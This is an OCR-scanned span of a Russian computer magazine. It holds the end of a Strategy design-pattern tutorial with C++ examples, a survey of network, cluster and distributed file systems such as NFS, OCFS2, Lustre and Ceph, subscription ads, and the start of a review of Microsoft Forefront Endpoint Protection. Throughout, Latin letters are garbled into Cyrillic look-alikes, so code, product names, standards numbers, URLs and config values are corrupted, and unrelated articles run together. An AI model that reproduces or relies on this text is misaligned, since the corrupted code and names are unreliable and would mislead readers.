зоипсІВеЬаѵіог . такеБоипсІ ( ) ; 

}; 

ѵоісі такеРЬоіоО 

{ 

рЬоіоВеЬаѵіог . такеРЬо1:о( ) ; 

}; 

} 

Помимо интерфейсных переменных мы объявляем в классе 
МоЬіІеРЬопе еще и методы такеРЬоІо и такеЭоипсІ, но их выполне- 
ние делегируем рЬоІоВеЬаѵіоги зоипсІВеЬаѵіог. Классы, описывающие 
конкретные модели телефонов будут инициализировать переменные 
рЬоІоВеЬаѵіоги зоипсІВеЬаѵіог нужными реализациями соответствую- 
щих интерфейсов. Чтобы было понятнее, взглянем на код: 

Субклассы МоЬіІеРЬопе 

сіазз МоіогоІаІ-9 : риЬІіс МоЬіІеРЬопе 

{ 

Моіого1аІ_9() 

{ 

рЬоіоВеЬаѵіог = пем ОоРЬоіо(); 

зоипсІВеЬаѵіог = пем Мр35оипсІ(); 

}; 

} 

сіазз ІМокіаЗЗІѲ : риЫіс МоЬіІеРІіопе 

{ 

І\Іокіа3310() 

{ 

рЬоіоВеЬаѵіог = ем Сап1:0оРЬо1:о( ) ; 

зоипсІВеЬаѵіог = ем Ро1урЬопу5оипсІ( ) ; 

}; 

} 



МоіогоІаІ-9 тоіог; 

// моторола успешно делает фото 
тоіог . такеРЬоіо( ) ; 

// ...и проигрывает шрЗ 
то1:ог.таке5оипсІ() ; 



ІМокіаЗЗІѲ покіа; 

// а вот 3310 не может фоткать даже при том, что вызов метода 
проходит успешно 
покІа.такеРЬоіоО ; 

// и играет полифонию 
пок1а.таке5оипсІ() ; 

В данном случае конкретную реализацию какого-либо интерфей- 
са мы жестко привязываем к переменной в конструкторе на этапе 
компиляции. Это не совсем правильно, но в рамках нашей задачи не 
существенно. Теперь на наши мобильники не влияет изменение кода, 
ответственного за фото и звук. Мы можем добавлять скольугодно 
много новых реализаций этих функций, и это никак не отразится на 
уже существующих классах. 

Некоторые могут спросить, почему мы реализовали связьс интер- 
фейсами при помощи отношения «содержит», а не «является». 
Иными словами, почему мы включили переменные рЬоІоВеЬаѵіог и 
зоипсІВеЬаѵіог внутрь класса МоЬіІеРЬопе, а не объявили базовыми 
классами конкретные реализации интерфейсов для классов сотовых 
телефонов? Основная причина заключается втом, что мы бы поте- 
ряли гибкость и не смогли динамически менять поведение объектов 
класса. Сейчас, чтобы заставить мобилку с трЗ-мелодии переклю- 
читься на полифонию, достаточно использовать зеі-метод, который 
перео предел ит зоипсІВеЬаѵіог. 

Динамическое изменение поведения 

сІазБ Моіого1аІ_9 : риЬІіс МоЬіІеРЬопе 

{ 

Моіого1аІ_9( ) 

{ 

рЬоіоВеЬаѵіог = іем ОоРЬоіоО; 

зоипсІВеЬаѵіог = іем Мр35оипсІ(); 

}; 

ѵоісі зе1:ІРЬопе5оипсІ(іРЬопе5оипсІ &зоипсІ) 

{ 

зоипсІВеЬаѵіог = зоипсі; 

}; 

} 



Моіого1аІ_9 тоіог; 

// проигрываем трЗ 
тоіог.такеБоипсІО ; 

// меняем на полифонию 

тоіог. 5еіІРЬопе5оипсІ(пеі\? Ро1урЬопу5оипсІ() ) ; 

// и играем уже полифоническим синтезатором 
тоіог.таке5оипсІ() ; 

Все это вместе и есть паттерн «Стратегия». Если попытаться дать более- 
менее строгое определение, то можно сказать, что паттерн «Стратегия» 
определяетсемейство алгоритмов, инкапсулирует каждый из них и 
обеспечивает их взаимозаменяемость. Он позволяет модифицировать 
алгоритмы независимо отих использования на стороне клиента. 

Заключение 

Теперь мы знаем, что такое паттерн «Стратегия». Болеетого, теперь 
мы поняли суть программирования с помощью паттернов, которая 
заключается в выделении непостоянных кусков кода и их изо- 
лировании отболее стабильных частей. В следующих статьях мы 
познакомимся с другими приемами для проектирования боль- 
ших приложений и еще больше приблизимся к уровню гуру 00- 
программирования. зл 
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■ ■ Евгений Зобнин (ехесЬіЬги) 




Сеть из файлов 

Распределенные файловые 
системы наших дней 

Популярность модели облачных вычислений, достигшей в последние годы чуть ли не своего 
апогея, привела к бурному развитию так называемых кластерных файловых систем, способных 
обеспечить простой и надежный способ хранения данных на множестве узлов с возможностью 
доступа к ним сотен и тысяч клиентов. Проблема только в том, что информации о таких ФС не 
так много, и с наскоку разобраться в их разнообразии довольно проблематично. 



В этой статье мы рассмотрим несколько примеров различных рас- 
пределенных файловых систем, определим сферы их применения 
и постараемся разобраться стем, почему этот вопрос часто вводит 
в заблуждение даже матерых админов. Начнем, как и полагается, с 
терминологии, а точнее — с ее отсутствия. 

Зерна от плевел 

Основная проблема новичков, делающих первые шаги в область 
кластерных (или все-таки распределенных?) файловых систем 
заключается в том, что здесь досихпорне существует четкой тер- 
минологии, отделяющей множество самых разнообразных ФС друг 
от друга. Такие понятия как сетевая, кластерная, распределенная 
и даже параллельная ФС уже давно слились в одно целое, поэтому 
для неподготовленного человека оказывается чрезвычайно 
трудно выбрать ту ФС, которая лучше всего подходит для решения 
его задачи. 

Чтобы не запутывать себя и читателя, я буду использовать метод 
классификации ФС, основанный на сфере их применения. В моей 
терминологии будет всего три основных типа ФС: 

1 . Сетевые. Это файловые системы, предназначенные в первую 
очередь для расшаривания не слишком интенсивно используемых 
данных между небольшим количеством узлов. Типичнейший при- 
мер сетевой файловой системы — это N88 в II N IX и С 188 в ѴѴіпсіоѵѵб. 
Обычный пример ее использования — обмен документации между 
рабочими станциями или разделение общей корневой ФС между 
несколькими серверами. Плюс таких ФС — простота обслуживания, 
минус — низкая производительность и стойкость к нагрузкам. 

2. Кластерные. Это файловые системы, предназначенные для рас- 
шаривания данных между большим количеством узлов вычисли- 
тельного кластера. По самой своей природе являются более про- 
двинутой версией сетевых ФС с высокой производительностью, 
поддержкой защиты от сбоев, высоких нагрузок и большого коли- 
чества клиентов. В качестве примера таких ФС можно привести 
088/6882 от Реб Наі и ОС 882 от Огасіе. Это — своего рода «вещь в 
себе», поэтому говорить о минусах и плюсах здесь не стоит. 

3. Распределенные. Наиболее продвинутый в технологическом 
плане тип ФС. От первых двух отличается в первую очередь тем, 
что позволяет объединить множество удаленных хранилищ в 
одну большую виртуальную файловую систему, функционирую- 
щую как единое целое, а также имеет способность достаточно 
быстро работать поверх не самых быстрых каналов связи. Основ- 
ное назначение такой ФС — те самые облака и СРЮ, хранилище 
для которых можно составить из множества дешевых, разнесен- 
ных по разным частям света серверов. Примеры: І_изІге, Серб, 
61изІег88 и конечно же ОоодІеРЭ, используемая для поддержки 
серверов Ооодіе. 



Теперь, следуя этой простой классификации, рассмотрим наи- 
более интересные и успешные примеры реализации ФС каждого 
типа. 

ЫР5, СІР5 и РОНМЕІ.Р5 

Наверное, самая известная и узнаваемая реализация идеи 
сетевой файловой системы (по крайней мере для тех, кто знаком 
с II N IX) — это N88, название которой так и расшифровывается — 
Ыеіѵѵогк Рііе 8узІет. 

N88 была разработана компанией 5ип Місгозузіетз (ныне Огасіе) 
еще в конце восьмидесятых годов и стала общепринятым стандар- 
том после выхода в свет версии 2.0 в 1 989 году, когда и был утверж- 
ден описывающий ее стандарт Р8С1 094 (первая версия системы, а 
точнее протокола, лежащего в его основе, была закрытым экспери- 
ментальным проектом, который видели только сотрудники 5ип). 
Несмотря на громкое название, N88 не является файловой 
системой в прямом смысле этого слова. На самом деле — это 
сетевой протокол, предназначенный для удаленного вызова про- 
цедур (РРС), реализующих набор функций для доступа к файлам, 
управляемых любой файловой системой. Такой подход сделал N88 
чрезвычайно простой системой, благодаря которой она быстро 
распространилась за пределы операционной системы ЭипОЭ, для 
которой была изначально разработана. Сегодня реализации N88 
третьей версии доступны практически для любой мало-мальски 
популярной ОС, включая минималистичные системы для низко- 
производительных устройств. 

Предельная простота настройки также сыграла свою роль в по- 
пуляризации технологии. Фактически все, что требуется сделать, 
чтобы настроить ЫР8-сервер, — это добавить по одной строке в 
два системных конфигурационных файла (/еіс/ехрогіз и /еіс/бозіз. 
аііоѵѵ) и перезапустить сервер піъсі. Далее можно примонтировать 
файловую систему с удаленной стороны точнотакже, какэто дела- 
ется для локальной ФС. Для монтирования доступных только для 
чтения корневых файловых систем серверов это просто идеаль- 
ный вариант, однако когда речь заходит об организации доступа 
десятков и сотен клиентов кхранилищу для записи и чтения, N88 
начинает подводить. 

Главная беда N88 — это производительность. Являясь всего лишь 
протоколом, N88 просто технически не способен обеспечить 
приемлемый уровень производительности для одновременного 
и быстрого обслуживания множества клиентов. Все попытки при- 
способить протокол для этой задачи провалились или были просто 
не замечены администраторами на фоне появления распреде- 
ленных и кластерных файловых систем. Инициативы по созданию 
«правильной альтернативы» также в большинстве своем ни к чему 
не привели, за исключением разве что файловой системы с экс- 
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центричным названием Р0НМЕІ_Р5, однако она носит 
статус экспериментальной и работаеттолько в І_іпих 
(подробнее во врезке). 

Вторая беда ЫР5 — это отсутствие того, что в среде 
программистов принято называть термином сасбе- 
собегепі Протокол ЫР5 устроен так, что ни один клиент 
расшаренной фа иловой системы не имеет гарантии 
того, что полученные клиентом метаданные файлов 
будут актуальны в следующий момент времени. На 
практике это означает, что если клиент «А» запросит 
у сервера информацию о файле (имя, размер, даты 
создания и модификации, права доступа и т.д.) , а 
клиент «Б» сразу после этого переименует этот файл 
или, например, измен ит его права доступа, то клиент 
«А» не узнает о случившимся и будет иметь ложное 
представление о файле со всеми вытекающими отсюда 
последствиями. При подключении ФС в режиме геаб- 
опіу это не приведет ни чему плохому, так как состояние 
ФС неизменно, а вот при параллельной интенсивной 
работе с данными, доступными для записи, может вы- 
литься во что угодно. 

Эти проблемы делают ЫР8 неприемлемым для исполь- 
зования в кластерах, предусматривающих наличие 
большого количества интенсивно работающих с дан- 
ными клиентов. Поэтому для этих целей были созданы 
кластерные файловые системы. 

ОСР52 и ОР52 

Кластерные файловые системы устроены совершенно 
иначе. Их задача заключается не в доставке данных 
по каналам связи, а в реализации механизма, который 



бы позволил получить доступ к этим данным сразу с 
нескольких машин и обеспечивал свое в ременное 
информирование клиентов о любых изменениях в 
ФС и обработку возможных ошибок и сбоев в работе 
клиентов. 

Кластерные ФС представляют собой дисковую фай- 
ловую систему, которая реализует схожие с совре- 
менными ФС возможности, но использует несколько 
иной механизм работы, предполагающий наличие 
большого количества клиентов, одновременно под- 
ключающих ФС к своему пространству имен. Работа 
по доставке данных при этом возлагается на специа- 
лизированное оборудование, такое, как серверы ВАІ\І, 
позволяющие разделить общий диск между десятка- 
ми машин с помощью протоколов РіЬгеСбаппеІ, І5С5І 
или АоР. 

Три главные характеристики кластерных или, как их 
иногда называют, параллельных ФС — это доступ- 
ность данных, производительность и устойчивость к 
ошибкам, выходу использующих ее узлов из строя. При 
этом далеко невсеизних достигаются с помощью реа- 
лизации определенных механизмов внутри драйвера 
файловой системы. 

Например, высока я доступность данных обычно до- 
стигается за счет использования различных схем РАЮ, 
а также механизмов 5АЫ и источников бесперебой- 
ного питания. Эта характеристика не имеет прямого 
отношения к самой ФС, однако является важной для ее 
пользователей. 

Производительность также является следствием ис- 
пользования соответствующихтехнологий, которые 




С помощью 
прокси-сервера 
РАБОЭ ( бЦр://серб. 
пеѵѵсігеат.пеі/ѵѵікі/ 
РАР05 Саіеѵѵаѵ ) в 
качестве хранилища 
для Серб можно ис- 
пользовать Атагоп 
53. 
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СерИ имеет автоматический механизм балансировки, распределяющий ответственность за отдачу метаданных тех 
или иных файлов между серверами 




Консоль управления ОСР52 

позволяют доставлять данные быстро и без задержек, однако 
здесь кластерные файловые системы также играют свою роль. 
Чтобы клиенты файловой системы не могли нарушить ее целост- 
ность, используется механизм блокировок, который управляет 
доступом узлов к данным, позволяя заблокировать файл для всех 
остальных участников кластера, в то время как один узел изменяет 
его содержимое. Это стандартная мера защиты, предотвращаю- 
щая порчу данных, реализацию которой можно найти в любой 
классической ФС. Однако в кластерной ФС она имеет некоторые 
особенности, улучшающие общую производительность. 

При интенсивной работе с данными, классический механизм 
блокировок становится узким местом и может привести к суще- 
ственным задержкам. Современные кластерные ФС используют 
более гибкую систему блокировок, которая позволяет блокировать 
не весь файл целиком, а только его часть, нужную для запи- 
си клиентом, позволяя другим клиентам в это время спокойно 
модифицировать другие части этого файла. Подобный механизм 
предусмотрен и для блокирования іпосіе. Также, для улучшения 
производительности кластерная файловая система можеттребо- 
вать отдельный сервер управления метаданными, который будет 
быстро обрабатывать запросы на доступ и модификацию іпобе- 
записей файловой системы, однако современные кластерные ФС, 
такие как 0Р52 или 0СР52, используют вместо этого метод пере- 



кладывания этих функций на плечи клиентов. Так, чтобы каждый 
клиент отвечал за метаданные тех файлов, с которыми он работает 
больше других. 

Устойчивость кошибками гарантия целостности файловой 
системы достигаются несколькими путями. Во-первых, за счет ис- 
пользования менеджера блокировок, который не является частью 
файловой системы и работает как независимый сетевой сервис 
(например, в 0Р52 используется 01_М — Оізігібиіесі І_оск Мападег). 
Именно он отвечает за блокировку файлов и распространение 
жетонов, используемых для получения прав на модификацию тех 
или иных частей ФС, между клиентами. Кроме того, обычноонже 
выполняет роль информатора клиентов о текущем состоянии ФС, 
решая таким образом главную проблему протокола І\ІРВ и всех 
других подобных ФС. В идеале уровень осведомленности узлов 
кластерной файловой системы должен стать таким, чтобы в любой 
момент времени любой клиент ФС смог и меть точное представ- 
ление о текущем положений вещей вне зависимости от выхода 
отдельных узлов из строя (6Р52 и 0СР52 обеспечивают это). 
РІаконец, в-третьих, любая кластерная файловая система имеет 
механизм извещения об узлах, вышедших из строя, который по- 
зволяет оперативно отключить неисправных клиентов до того, 
как они успеют навредить содержимому файловой системы. Этот 
механизм называется [епсіпд и также, как менеджер блокировок 
реализуется в виде независимой сетевой службы, которая, тем не 
менее, работает в тесном контакте с самой ФС. Как и большинство 
классических файловых систем, современные кластерные ФС 
журналируемые, а это значит, что любые изменения метаданных 
перед тем, как попасть на диск, помещаются в журнал, который 
можно будет использовать для отката и быстрого восстановления 
корректного состояния ФС в случае сбоя. Ріо кластерная файловая 
система использует журнал также и для того, чтобы бороться со 
сбоями клиентов. 

Достигается это следующим образом. Для каждого подключен- 
ного клиента создается собственный журнал, в котором протоко- 
лируются все действия этого клиента над файлами и их мета- 
данными (либо — для улучшения производительности — только 
метаданными), которые стираются после их актуализации, то есть, 
после внесения изменений непосредственно в структуры ФС (до 
этого они какое-то время могут провисеть в кэше). В том случае, 
если клиент начинает работу над каким-то файлом и в это время 
уходит в даун, файловая система получает звоночек, который 
включает механизм отката произведенных им изменений, благо- 
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Похмельная ФС 



Файловая система Р0НМЕБЕ5 (ЬирУ/ѵѵѵѵѵѵ.іогетар.пеі/р^есІз/ 
роИте^з), созданная Евгением Поляковым и уже включенная 
в ядро І_іпих р сочетает в себе лучшие черты как сетевых, так и 
кластерных ФС. Ее основные особенности: 

• Согласованный кэш данных и метаданных для всех клиентов 
(решение основной проблемы ЫЕ5). 

• Асинхронный режим работы. 

• Высокая производительность. 

• Прозрачное зеркалирование данных на несколько узлов 
сети (этакий сетевой РАЮ) с возможностью параллельного 
получения данных с них. 

• Возможность на лету добавлять и удалять серверы хранения 
без перемонтирования ресурса. 

• Встроенные средства аутентификации и шифрования. 

Как и ЫЕ5, Р0НМЕБЕ5 всего лишь протокол, поэтому она 
априори медленнее кластерных файловых систем и к тому же 
имеет примитивный механизм блокировок, не позволяющий 
блокировать для записи только часть файла или его 
метаданных. 



даря чему ФС удается не остаться в пограничном, противоречи- 
вом состоянии. 

Описанные особенности делают кластерные файловые системы 
чрезвычайно быстрыми и устойчивыми, однако по мере роста 
количества клиентов их производительность падает, а после 
пересечения рубежа в сотню-другую клиентов становится просто 
неприемлемой. Поэтому для кластеров, имеющих размерность 
больше тысячи узлов, были придуманы самые совершенные из 
всех представленных в данный момент файловых систем, которые 
в нашем обзоре носятзвание распределенных. 

Шзіе, Серб и ОІизіегРЗ 

В распределенных файловых системах используется совершенно 
иной подход к управлению данными, смысл которого не в том, 
чтобы собрать все яйца в одну корзину и обеспечить эффектив- 
ный механизм их совместного использования, как это сделано 
в кластерных ФС, а в том, чтобы размазать данные по как можно 
большему количеству серверов, да так, чтобы клиенты считали их 
одним целым. 

За многие годы исследований было предложено множество 
самых разнообразных подходов к реализации этой идеи, однако 
наибольшее распространение получила архитектура, на которой 
построена файловая система Бизіте. 

Бизіге ( ѵѵѵѵѵѵ.іизіге.сопп ) была разработана компанией Сіизіег 
Еііе Зузіеппз, которая была поглощена 5ип Місгозузіетз в 2007 
году. Бизіге (название которой произошло от слияния слов І_іп их 
и Сіизіег) является полностью открытой разработкой, которую 
можно использовать для любых целей безо всяких лицензионных 
отчислений. 

Главная особенность и достоинство Бизіге — это многоуровневая 
система обработки запросов доступа к данным, которая предпо- 
лагает наличие нескольких типов серверов, каждый из которых 
выполняет определенную роль. 

Всего существует три типа серверов: 

1. Сервер метаданных (М05), который отвечаетза хранение 
метаданных файлов, таких как имя, размер, атрибуты, содержимое 
каталогов и т.д. Это первое звено на пути обработки запроса на 
доступ к данным. Задача сервера метаданных — принять запрос и 
вернуть информацию о файле и/или ссылку на «объект», который 



пойе : 

ір_рогі - 7777 
ір.аеігезз = 192 , 168 ,1,2 
питЬег = 3 
пате = по сіе 1 
сіизіег = осіз2 

посіе : 

ір_рогі - 7777 
ір„асігезз = 192,168.1.3 
питЬег = 1 
пате = посІе2 
сіизіег = осіз2 

сіизіег : 

пойе.соипі = 2 
пате = осіз2 



Конфигурационный файл для ОСР52 

хранится на сервере хранения. 

2 . Сервер хранения объектов (055). Здесь хранится содержимое 
файлов, то есть объекты, адресуемые сервером метаданных. Когда 
последний получает запрос на чтение/запись определенного 
файла, он отдает клиенту ссылку на объект файла, которая состоит 
из адреса сервера хранения и идентификатора объекта, после 
чего клиент самостоятельно запрашивает содержимое объекта у 
сервера хранения. Каждый такой сервер может иметь от двух до 
восьми целей хранения (05Т), которые могут быть либо жесткими 
дисками, либо любыми другими блочными устройствами, включая 
виртуальные образы. 

3. Сервер управления (М05). Он ответственен за хранение конфи- 
гурации всей файловой системы и отвечаетза ее распростране- 
ние между остальными участниками. Обычно М 65 совмещается с 
сервером метаданных. 

Конфигурация кластера, использующего файловую систему Бизіге, 
обычно выглядит следующим образом: несколько десятков или 
сотен машин выполняют роли серверов хранения, еще несколь- 
ко машин работают в качестве серверов метаданных. Клиенты, 
желающие получить доступ кфайловой системе, подключают 
(монтируют) ее, используя адрес головного сервера метаданных. 
После этого содержимое ФС становится видным в их пространстве 
имен клиента (например, в каталоге /Іизіге). 

При попытке прочитать/изменить какой-либо файл в этом каталоге 
происходитзапрос серверу метаданных, который находитего 
информацию в своей базе данных и отправляет клиенту его атри- 
буты и ссылку на сервер, содержащий необходимый объект. При 
заполнении файловой системы информацией файлы (объекты) 
равномерно распределяются между всеми серверами хранения, 
а также дублируются на случай выхода одного из них из строя (в 
этом случае сервер метаданных автоматически изменит свою базу 
данныхтак, чтобы ссылки указывали на резервный сервер). 

Такая многоуровневая архитектура делает Бизіге чрезвычайно 
масштабируемой и стойкой ксбоям. Благодаря использованию 
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Меіасіаіа орегаііопз 
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зіогаде 



ОЬіесІ Зіогаде Сіизіег 



Ьа&Ь 



С точки зрения архитектуры СерИ почти ничем не отличается от Шзіге 



нескольких серверов хранения и серверов метаданных, удает- 
ся не только сделать хранилище действительно большим, ной 
равномерно распределить нагрузку между серверами, избежав 
появления узких мест (например, если один сервер метаданных 
перестает справляться с нагрузкой, в сеть в любой момент можно 
добавить дополнительные сервера, которые смогут взять на себя 
обслуживание части клиентов). 

Кроме этого І_из1:ге поддерживает возможность наложения квот 
для каждого клиента, реализует совместимую со стандартом Р05ІХ 
систему разделения прав доступа, позволяет настроить аутенти- 
фикацию клиентов и имеет гибкий механизм резервного копиро- 
вания. Однако у І_изіге есть и несколько проблем, которые зача- 




стую приводят к тому, что для расширения файловой системы или 
при выходе из строя одного из узлов, ее приходится останавливать 
и переконфигурировать. Поэтомуза последнее время родилось 
несколько проектов, призванных устранить эти недостатки. Самые 
заметные из них — это файловые системы Серб и ѲІазіегРБ. 

Серб ( бир://серб.пеѵѵсІгеапп.пе1: ) была представлена мируСэйджем 
Вилом в ноябре 2007 года, и позиционировалась, какфайловая 
система, основанная на идеях бизіте, но лишенная ее недостат- 
ков. Первая версия системы была основана на Ризе, но позже 
автор переписал ее в виде модуля ядра Ы п их, который официаль- 
но стал частью Ыпих, начиная с версии 2.6.34. 

Основное отличие Серб от своего прародителя заключается в ее 
высокой интеллектуальности. Единожды настроив кластер, можно 
на очень долгое время забыть о его поддержке. Файловая система 
будет сама производить ребалансировку нагрузки, репликацию 
данных и их миграцию при наращивании количества серверов. 

Как говорит сам автор, начав с небольшого кластера, состоящего 
из десятка машин, вы можете постепенно добавлять в систему все 
новые машины, увеличивая размер кластера в десятки раз, и это не 
потребует серьезного вмешательства администратора. Все будет 
«просто работать». 

Второе достоинство Серб — это простота развертывания. Боль- 
шинство компонентов ФС реализованы в пространстве пользо- 
вателя, а это значит, что при добавлении нового узла в кластер 
потребуется всего лишь установить на машину Ыпих-дистрибутив, 
несколько пакетов и исправить один конфигурационный файл. 
Благодаря наличию официального клиента файловой системы, 
основанного на Ризе, сделать клиентом ФС можно нетолько Ыпих- 
машину, но и ВЗй или Мае 05 X. 

Выводы 

Распределенные файловые системы — это будущее систем 
хранения информации. Привычные нам настольные приложения 
постепенно смещаются в облака, где для хранения информации 
используются гигантские распределенные хранилища, состоящие 
из сотен и тысяч дешевых серверов. Поэтому умение общаться с 
технологиями, лежащими в основе таких хранилищ, будет боль- 
шим плюсом к портфолио любого сисадмина, □с 
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6 номеров 564 руб. 
13 номеров 1105 руб. 




6 номеров 810 руб. 
12 номеров 1470 руб. 



6 номеров 785 руб. 
12 номеров 1420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 









6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1300 руб. 
1 2 номеров 2300 руб. 



ПОДПИШИСЬ! 

зНор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это 
гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 

8 - 800 - 200 - 3-999 
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6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 







6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 2178 руб. 
1 2 номеров 3960 руб. 



(дате)іаіиі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 
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■ ■ Сергей «дгіпсіег» Яремчук (дгіпііеггаиа.іт) 




Конечная 
точка защиты 

Рогейгопі Епсіроіпі: Ргоіесііоп: 

решение для защиты компьютеров с ѴѴіпсІоѵѵз 

В конце 2010 года Місгозоіі представила комплексную систему защиты рабочих станций и серверов — 
Еогеігопі Епсіроіпі Ргоіесііоп, появление которой вызвало большой интерес у специалистов по безопас- 
ности. Интересного здесь много — новая технология обновлений, простая интеграция с существующей 
инфраструктурой, комплексный подход к защите и многое другое. 



Назначение 

Еогеігопі Епсіроіпі Ргоіесііоп 

Не секрет, что сегодня антивирусы являются основой системы за- 
щиты любой корпоративной сети. Ежегодно на закупку и обновление 
лицензий компании тратятогромные средства. Естественно, этот 
лакомый кусок привлекает многих, не осталась в стороне и корпора- 
ция Місгозоіі. Особо востребованы комплексные системы, позволяю- 
щие полностью защитить периметр от всех современныхугроз, как 
на рабочих местах, так и уровне сети, с возможностью централизо- 
ванного управления. Все системы сети должны проходить проверку 
на соответствие политикам безопасности — наличие антивируса, 
актуальность баз, межсетевой экран итакдалее. Функцию последне- 
го берет на себя технология защиты сетевого доступа ЫАР (Ыеіѵѵогк 
Асеева Ргоіесііоп), реализованная в ѴѴіп2к8 и старше (смотри в статье 
«Сетевой коп» в номере 1 2журнала ][ за 2008 год). Чтобы покрыть 
все требования, в М8 была начата разработка целого семейства, по- 
лучившего название Еогеігопі (ранее — Біігііпд, названное, очевидно, 
в честь знаменитого несгибаемого замка в Шотландии), призванное 
заменить старые продукты вроде ІБАЗегѵег, Іпіеііідепі Арріісаііоп 
Ѳаіеѵѵау, Ібепіііу Ыіесусіе Мападек плюс внедрить новые функции. 
Еогеігопі нужно понимать, как набор продуктов различного назначе- 
ния, покрывающий все необходимыетребования по защите сети и ра- 
бочих станций, управлению политиками и доступом к приложениям. В 
том числе в М3 начали разработку и своего антивируса. Естественно, 
не с нуля. Достаточно вспомнить МЗРТ (Маіісіоиз Зоііѵѵаге Реппоѵаі 
Тооі), ОпеСаге и ѴѴіпсІоѵѵз йеіепсіег, так что позитивный опыт в этом 
плане у них уже имеется. Первый шаг был сделан в виде М5 Зесигііу 
Еззепііаіз (Могго), который можно бесплатно использовать на лицен- 
зионной ѴѴіпХР-ѴѴіп7. Но для корпоративной среды М8Е не предна- 
значен (читай лицензию), кроме этого в МЗЕ отсутствует возможность 
централизованного управления и контроля. Место корпоративного 
антивируса и был призван занять Еогеігопі Епсіроіпі Ргоіесііоп, за- 
дача которого — защита ѴѴіп, как настольных решений, так и серверов, 
в сетях различного назначения имеющих от десятка и более компью- 
теров. Первоначально он назывался Еогеігопі Сііепі Зесигііу, затем 
получил новое имя. Версия ЕЕР 2010 была представлена в конце 2010 
года. Сейчас активно идет разработка ЕЕР 2012, бета-релиз которой 
вышел в середине мая. 

Возможности РЕР 2010 

Клиент, устанавливаемый на конечных компьютерах, обеспечивает 
защиту от известных и неизвестныхугроз, вирусов, шпионского ПО 
и руткитов. Чтобы удовлетворить всем требованиям, ЕЕР содержит 



несколько компонентов, работающих на разном уровне — прило- 
жения, файловая система и сеть. Для выполнения своих задач он 
интегрируется с Центром безопасности ѴѴіпсІоѵѵз, ѴѴіпсІоѵѵз Рігеѵѵа II, 
АррІ_оскег, управляя их настройками и отслеживая изменения в 
конфигурационных файлах системы. Во время установки клиента до- 
бавляются специальные компоненты, позволяющие строить защиту 
на уровне ядра, втом числе — и обнаруживать руткиты. Согласись, 
только у разработчиков ОС могут быть все необходимые инструменты, 
работающие на очень низком уровне, остальным вендорам приходит- 
ся как-то выкручиваться. Для защиты от многихтипов сетевых атак 
ЕЕР содержит ІР8 (систему предотвращения вторжения) — Ыеіѵѵогк 
Іпзресііоп Бузіет (N18). Напомню, что N18 используется втом числе 
и на Еогеігопі ТМ 0 2010, только в случае с ЕЕР она защищает от атаки 
отдельный хост, а не сеть. Для решения своихзадач клиентвзаимо- 
действует и с №іѵѵогк Ассезз Ргоіесііоп ^АР). 

Антивирус наряду страдиционным сигнатурным анализом ис- 
пользуети модульдинамическойтрансляции (Оупатіс Ігапзіаііоп 
апб Етиіаііоп), когда программа прогоняется в режиме эмуляции 
и анализируется, что она делает. Таким образом, увеличивается 
вероятность обнаружения новых вирусов. На этом этапе может вклю- 
читься в работу еще один интересный компонент, известный тем, кто 
юзает Місгозоіі 8еси гііу Еззепііаіз — служба динамических сигнатур 
088 (Оупатіс 8ід паіи ге Зегѵісе). Если во входе анализа файл будет 
расценен как подозрительный, (например, пытается сразу изме- 
нить защищенные части ОС), но сигнатуры этого вируса в базе нет, 
то генерируется профиль файла, который отсылается для анализа 
в специальные сервисы Місгозоіі — 088, 8руNе^ и МВБ (Місгозоіі 
Рериіаііоп Зегѵісез). В случае, когда в базе обновлений сигнатура 
уже есть, но она не скачана, автоматически обновляются базы. В 
сигнатурах содержится нетолько часть «тела» вируса, но и некоторые 
типичные сценарии поведения, позволяющие однозначно опреде- 
лить зловредность программы. 

Одна из задач, которые ставилась при разработке ЕЕР — «не мешать», 
поэтому конфигурация поумолчанию рассчитана на высокий уровень 
производительности. Управление функциями ЕЕР производится на 
основе политик, и администратор может гибко настроить функции 
системы защиты в зависимости от их назначения — рабочая станция, 
файловый или почтовый сервер и такдалее. В поставке доступен ряд 
предустановок, представляемых компаниями-разработчиками для 
своих продуктов. Также изначально минимизировано взаимодей- 
ствие с пользователем, который в настройках поумолчанию получает 
только действительно важные сообщения. Еще один интересный 
момент. К стандартным сканированиям (по требованию и распи- 
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санию) добавлен интеллектуальный режим, когда РЕР 
оценивает состояние системы и применяет решение об 
уровне проверки. В том случае, когда вирус или руткит 
нельзя удалить на рабочей системе, будет произведена 
попытка удаления в процессе перезагрузки. В качестве 
клиентских компьютеров поддерживаются ѴѴіпХРЗ/ѴізІа/7 
и серверные версии Ѵ\/іп2кЗ/2к8/2к8Р2. Управление из 
центральной консоли версиями на ѴѴіп7 Зіагіег, ѴѴіп7 
РІоте и Ѵізіа Вазіс не предусмотрено и установить кли- 
ентскую часть на такие компьютеры можно лишь вручную. 
В принципе почти все это мы втой или иной мере встре- 
чали у разработчиков других антивирусных продуктов 
корпоративного уровня. Еще одна фишка РЕРсостоитв 
том, что для централизованного управления используется 
Зузіет СепІегСопІідигаІіоп Мападег. Последний предна- 
значен дляуправления группами компьютеров, установки 
и обновления ПО на них, этоупрощаетустановку РЕР на 
конечных компьютерах. Это позволяетснизить стоимость 
владения, особенно в тех случаях, если организация 
уже использует 5ССМ (подробнее читай об этом в статье 
«РІачальниксети» в номере 08 журнала ][за 2009 год). 

Нет необходимости в развертывании дополнительной 
инфраструктуры, все настройки производятся в едином 
интерфейсе, администратор сразу видит состояние всех 
компонентов сети. Опять же необходимости в переучива- 
нии персонала. Соответственно, уже готово все для сбора 
данных, последующий апдейт ядер и антивирусных баз. 
Ріо это же является и недостатком РЕР, ведь если нет, то 
5ССМ придется его развернуть — со всеми вытекающи- 
